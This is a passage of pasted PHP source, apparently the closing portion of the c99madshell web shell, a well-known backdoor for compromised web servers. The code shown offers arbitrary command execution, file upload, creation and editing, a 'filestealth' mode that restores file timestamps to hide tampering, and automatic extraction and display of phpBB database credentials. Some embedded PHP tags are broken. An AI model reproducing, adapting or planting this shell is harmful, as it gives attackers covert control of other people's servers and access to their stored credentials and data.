  2338.    echo "<tr><td><b>Perms</b></td><td><a href=\"#\" onclick=\"document.todo.act.value='chmod';document.todo.f.value='".urlencode($f)."';document.todo.d.value='".urlencode($d)."';document.todo.submit();\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>";
  2339.    $fi = fopen($d.$f,"rb");
  2340.    if ($fi)
  2341.    {
  2342.     if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));}
  2343.     else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}
  2344.     $n = 0;
  2345.     $a0 = "00000000<br>";
  2346.     $a1 = "";
  2347.     $a2 = "";
  2348.     for ($i=0; $i<strlen($str); $i++)
  2349.     {
  2350.      $a1 .= sprintf("%02X",ord($str[$i]))." ";
  2351.      switch (ord($str[$i]))
  2352.      {
  2353.       case 0:  $a2 .= "<font>0</font>"; break;
  2354.       case 32:
  2355.       case 10:
  2356.       case 13: $a2 .= "&nbsp;"; break;
  2357.       default: $a2 .= htmlspecialchars($str[$i]);
  2358.      }
  2359.      $n++;
  2360.      if ($n == $hexdump_rows)
  2361.      {
  2362.       $n = 0;
  2363.       if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
  2364.       $a1 .= "<br>";
  2365.       $a2 .= "<br>";
  2366.      }
  2367.     }
  2368.     //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";}
  2369.     echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>";
  2370.    }
  2371.    $encoded = "";
  2372.    if ($base64 == 1)
  2373.    {
  2374.     echo "<b>Base64 Encode</b><br>";
  2375.     $encoded = base64_encode(file_get_contents($d.$f));
  2376.    }
  2377.    elseif($base64 == 2)
  2378.    {
  2379.     echo "<b>Base64 Encode + Chunk</b><br>";
  2380.     $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
  2381.    }
  2382.    elseif($base64 == 3)
  2383.    {
  2384.     echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
  2385.     $encoded = base64_encode(file_get_contents($d.$f));
  2386.     $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
  2387.    }
  2388.    elseif($base64 == 4)
  2389.    {
  2390.     $text = file_get_contents($d.$f);
  2391.     $encoded = base64_decode($text);
  2392.     echo "<b>Base64 Decode";
  2393.     if (base64_encode($encoded) != $text) {echo " (failed)";}
  2394.     echo "</b><br>";
  2395.    }
  2396.    if (!empty($encoded))
  2397.    {
  2398.     echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
  2399.    }
  2400.    echo "<b>HEXDUMP:</b><nobr> [<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='info';document.todo.fullhexdump.value='1';document.todo.d.value='".urlencode($d)."';document.todo.submit();\">Full</a>] [<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='info';document.todo.d.value='".urlencode($d)."';document.todo.submit();\">Preview</a>]<br><b>Base64: </b>
  2401. <nobr>[<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='info';document.todo.base64.value='1';document.todo.d.value='".urlencode($d)."';document.todo.submit();\">Encode</a>]&nbsp;</nobr>
  2402. <nobr>[<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='info';document.todo.base64.value='2';document.todo.d.value='".urlencode($d)."';document.todo.submit();\">+chunk</a>]&nbsp;</nobr>
  2403. <nobr>[<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='info';document.todo.base64.value='3';document.todo.d.value='".urlencode($d)."';document.todo.submit();\">+chunk+quotes</a>]&nbsp;</nobr>
  2404. <nobr>[<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='info';document.todo.base64.value='4';document.todo.d.value='".urlencode($d)."';document.todo.submit();\">Decode</a>]&nbsp;</nobr>
  2405. <P>";
  2406.   }
  2407.   elseif ($ft == "html")
  2408.   {
  2409.    if ($white) {@ob_clean();}
  2410.    echo $r;
  2411.    if ($white) {c99shexit();}
  2412.   }
  2413.   elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";}
  2414.   elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";}
  2415.   elseif ($ft == "phpsess")
  2416.   {
  2417.    echo "<pre>";
  2418.    $v = explode("|",$r);
  2419.    echo $v[0]."<br>";
  2420.    var_dump(unserialize($v[1]));
  2421.    echo "</pre>";
  2422.   }
  2423.   elseif ($ft == "exe")
  2424.   {
  2425.    $ext = explode(".",$f);
  2426.    $c = count($ext)-1;
  2427.    $ext = $ext[$c];
  2428.    $ext = strtolower($ext);
  2429.    $rft = "";
  2430.    foreach($exeftypes as $k=>$v)
  2431.    {
  2432.     if (in_array($ext,$v)) {$rft = $k; break;}
  2433.    }
  2434.    $cmd = str_replace("%f%",$f,$rft);
  2435.    echo "<b>Execute file:</b><form method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>";
  2436.   }
  2437.   elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";}
  2438.   elseif ($ft == "code")
  2439.   {
  2440.    if (ereg("php"."BB 2.(.*) auto-generated config file",$r))
  2441.    {
  2442.     $arr = explode("\n",$r);
  2443.     if (count($arr == 18))
  2444.     {
  2445.      include($d.$f);
  2446.      echo "<b>phpBB configuration is detected in this file!<br>";
  2447.      if ($dbms == "mysql4") {$dbms = "mysql";}
  2448.      if ($dbms == "mysql") {echo "<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($dbuser)."';document.sql.sql_passwd.value='".htmlspecialchars($dbpasswd)."';document.sql.sql_server.value='".htmlspecialchars($dbhost)."';document.sql.sql_port.value='3306';document.sql.sql_db.value='".htmlspecialchars($dbname)."';document.sql.submit();\"><b><u>Connect to DB</u></b></a><br><br>";}
  2449.      else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99madshell. Please, report us for fix.";}
  2450.      echo "Parameters for manual connect:<br>";
  2451.      $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
  2452.      foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
  2453.      echo "</b><hr size=\"1\" noshade>";
  2454.     }
  2455.    }
  2456.    echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">";
  2457.    if (!empty($white)) {@ob_clean();}
  2458.    highlight_file($d.$f);
  2459.    if (!empty($white)) {c99shexit();}
  2460.    echo "</div>";
  2461.   }
  2462.   elseif ($ft == "download")
  2463.   {
  2464.    @ob_clean();
  2465.    header("Content-type: application/octet-stream");
  2466.    header("Content-length: ".filesize($d.$f));
  2467.    header("Content-disposition: attachment; filename=\"".$f."\";");
  2468.    echo $r;
  2469.    exit;
  2470.   }
  2471.   elseif ($ft == "notepad")
  2472.   {
  2473.    @ob_clean();
  2474.    header("Content-type: text/plain");
  2475.    header("Content-disposition: attachment; filename=\"".$f.".txt\";");
  2476.    echo($r);
  2477.    exit;
  2478.   }
  2479.   elseif ($ft == "edit")
  2480.   {
  2481.    if (!empty($submit))
  2482.    {
  2483.     if ($filestealth) {$stat = stat($d.$f);}
  2484.     $fp = fopen($d.$f,"w");
  2485.     if (!$fp) {echo "<b>Can't write to file!</b>";}
  2486.     else
  2487.     {
  2488.      echo "<b>Saved!</b>";
  2489.      fwrite($fp,$edit_text);
  2490.      fclose($fp);
  2491.      if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
  2492.      $r = $edit_text;
  2493.     }
  2494.    }
  2495.    $rows = count(explode("\r\n",$r));
  2496.    if ($rows < 10) {$rows = 10;}
  2497.    if ($rows > 30) {$rows = 30;}
  2498.    echo "<form method=\"POST\"><input name='act' type='hidden' value='f'><input name='f' type='hidden' value='".urlencode($f)."'><input name='ft' type='hidden' value='edit'><input name='d' type='hidden' value='".urlencode($d)."'><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"document.todo.act.value='ls';document.todo.d.value='".addslashes(substr($d,0,-1))."';document.todo.submit();\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
  2499.   }
  2500.   elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
  2501.   else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
  2502.  }
  2503. }
  2504. if ($act == "about") {echo "r00t";}
  2505.  
  2506. </td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
  2507. <tr><td width="100%" height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="#" onclick="document.todo.act.value='cmd';document.todo.d.value='<?php echo urlencode($d);  ';document.todo.submit();"><b>Command execute</b></a> ::</b></p></td></tr>
  2508. <tr><td width="50%" height="1" valign="top"><center><b>Enter: </b><form method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd;  "><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd);  "><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td><td width="50%" height="1" valign="top"><center><b>Select: </b><form method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd;  "><select name="cmd"><?php foreach ($cmdaliases as $als) {echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";}  </select><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td></tr></TABLE>
  2509. <br>
  2510. <TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
  2511. <tr>
  2512.  <td width="50%" height="1" valign="top"><center><b>:: <a href="#" onclick="document.todo.act.value='search';document.todo.submit();"><b>Search</b></a> ::</b><form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd;  "><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1"  checked> - regexp&nbsp;<input type=submit name=submit value="Search"></form></center></p></td>
  2513.  <td width="50%" height="1" valign="top"><center><b>:: <a href="#" onclick="document.todo.act.value='upload';document.todo.submit();"><b>Upload</b></a> ::</b><form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type=hidden name="d" value="<?php echo $dispd;  "><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload"><br><?php echo $wdt;  </form></center></td>
  2514. </tr>
  2515. </table>
  2516. <br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Make Dir ::</b><form method="POST"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd;  "><input type="text" name="mkdir" size="50" value="<?php echo $dispd;  ">&nbsp;<input type=submit value="Create"><br><?php echo $wdt;  </form></center></td><td width="50%" height="1" valign="top"><center><b>:: Make File ::</b><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd;  "><input type="text" name="mkfile" size="50" value="<?php echo $dispd;  "><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><?php echo $wdt;  </form></center></td></tr></table>
  2517. <br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Go Dir ::</b><form method="POST"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd;  ">&nbsp;<input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Go File ::</b><form method="POST""><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd;  "><input type="text" name="f" size="50" value="<?php echo $dispd;  ">&nbsp;<input type=submit value="Go"></form></center></td></tr></table>
  2518. <br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ c99madshell v. <?php echo $shver;  <a href="#" OnClick="document.todo.act.value='about';document.todo.submit();"><u> EDITED BY </b><b>MADNET</u></b> </a>| <a href="http://securityprobe.net"><font color="#FF0000">http://securityprobe.net</font></a><font color="#FF0000"></font> | Generation time: <?php echo round(getmicrotime()-starttime,4);   ]--</b></p></td></tr></table>
  2519. </body></html><?php chdir($lastdir); c99shexit();
  2520. ?>
  2521.  
  2522. ==EOF
RAW Paste Data